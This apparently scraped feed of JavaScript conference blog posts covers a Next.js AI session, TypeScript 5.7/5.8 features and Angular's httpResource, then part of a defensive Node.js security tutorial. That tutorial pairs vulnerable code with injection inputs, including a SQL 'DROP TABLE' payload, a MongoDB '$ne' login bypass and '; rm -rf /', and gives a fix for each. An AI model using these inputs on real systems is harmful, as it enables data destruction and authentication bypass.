1. Understanding AI and Large Language Models (LLMs)

The Session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Keep up with JavaScript’s latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Vergessen, 'result' zuzuweisen
 }
 printResult();
 function printResult() {
   console.log(result); // kein Compiler-Error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Weitere Logik, in der keine Zuweisung an 'result' erfolgt

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Wird interpretiert als
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via compiler flag: –target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (‘restock’). The function “Object.groupBy()” is now passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the GroupBy function is an object (here the variable “result”) that contains the different groups as parameters. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Arrays gruppieren mittels Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays mit generischem Buffer-Typ

// Neu: TypedArray mit generischem ArrayBuffer-Typ
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Verwendung mit einem konkreten Typen:
// Hier SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exisitiert nur auf SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “–experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “–rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts.tsx.mts.cts to .js.jsx.mjs.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar'; //<-Standard-Import
import {Demo} from './bar.ts'; //<-Zum direkten Ausführen nötig

If the Node.js option “–experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “–erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: Namespace mit Runtime-Code
namespace container {
}

class Point {
 // error: Implizite Properties/Parameter-Properties
 constructor(public x: number, public y: number) { }
}

// error: Enum-Deklaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it naturally also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-**” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “–libReplacement=false*,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the project is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript runtime is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the –experimental-strip-types flag. New compiler options like –rewriteRelativeImportExtensions and –erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the –erasableSyntaxOnly compiler option do?
The –erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworldundergroundunderwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Level 1 in Overworld style

Figure 1: Level 1 in overworld style

Level 1 in the Underground style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient in the substructure enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

iJS Newsletter

Keep up with JavaScript’s latest news!

Level files

The different levels are described by our example JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a calculated signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a calculated signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Section of the tilemap used in the example

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information and uses the example to display the progress information to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKeystyle, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilesmap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signal and passes them to the engine’s animateLevel or rederLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram discussed is simply delegated to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const tilesMap = tilesMapResource.value();

  // undefined prevents the resource from beeing triggered
  const request = computed(() =>
    !tilesMap
      ? undefined
      : {
          tilesMap: tilesMap,
          style: style(),
        }
  );

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

iJS Newsletter

Keep up with JavaScript’s latest news!

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A calculated signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer console and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Node.js Overview

Node.js is an open source cross platform server environment that enables server side JavaScript. It has been in existence for a few years now and has grown to be a favorite among developers when it comes to building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides better speed and performance.

The other important feature of Node.js is its non-blocking, event-driven architecture. This model has enabled Node.js to work well with many concurrent connections and, for this reason, has been applied in real-time applications including chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also enhances its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread and wait for the operation to finish; instead, it carries on executing other code. This makes Node.js able to perform many tasks simultaneously, which is very beneficial.
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications are likely to deal with sensitive data including personal information, financial information and login credentials. The security of this data has to be secured to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application is secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated in respect to data security and privacy. It is necessary to make sure that Node.js applications are compliant with such rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;

const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {

  if (err) throw err;

  // Process result

});

If an attacker inputs admin’ — as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The — sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;

const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {

  if (err) throw err;

  // Process result

});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');

const mysql = require('mysql');

const app = express();

// Database connection

const connection = mysql.createConnection({

  host: 'localhost',

  user: 'root',

  password: 'password',

  database: 'users_db'

});

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // VULNERABLE CODE: Direct concatenation of user input

  const query = "SELECT * FROM users WHERE id = " + userId;

  

  connection.query(query, (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

Which attemps to delete the entire user’s table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {

  const userId = req.query.id;

  

  // SECURE CODE: Using parameterized queries

  const query = "SELECT * FROM users WHERE id = ?";

  

  connection.query(query, [userId], (err, results) => {

    if (err) throw err;

    res.json(results);

  });

});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically.
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;

const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {

  if (err) throw err;

  // Process user

});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);

const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {

  if (err) throw err;

  // Process user

});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;

  

  // VULNERABLE CODE: Directly using user input in aggregation pipeline

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } }, // Dangerous!

    { $limit: 20 }

  ];

  

  try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: err.message });

  }

});

The Attack

An attacker could send a malicious payload:

{

  "category": "electronics",

  "sortField": "$function: { body: function() { return  db.getSiblingDB('admin').auth('admin', 'password') } }"

}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {

  const { category, sortField } = req.body;  

  // Validate category

  if (typeof category !== 'string') {

    return res.status(400).json({ error: "Invalid category format" });

  }  

  // Validate sort field against allowlist

  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];

  if (!allowedSortFields.includes(sortField)) {

    return res.status(400).json({ error: "Invalid sort field" });

  }  

  // SECURE CODE: Using validated input

  const pipeline = [

    { $match: { category: category } },

    { $sort: { [sortField]: 1 } },

    { $limit: 20 }

  ]; try {

    const products = await productsCollection.aggregate(pipeline).toArray();

    res.json(products);

  } catch (err) {

    res.status(500).json({ error: "An error occurred" });

  }

});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');

const { exec } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

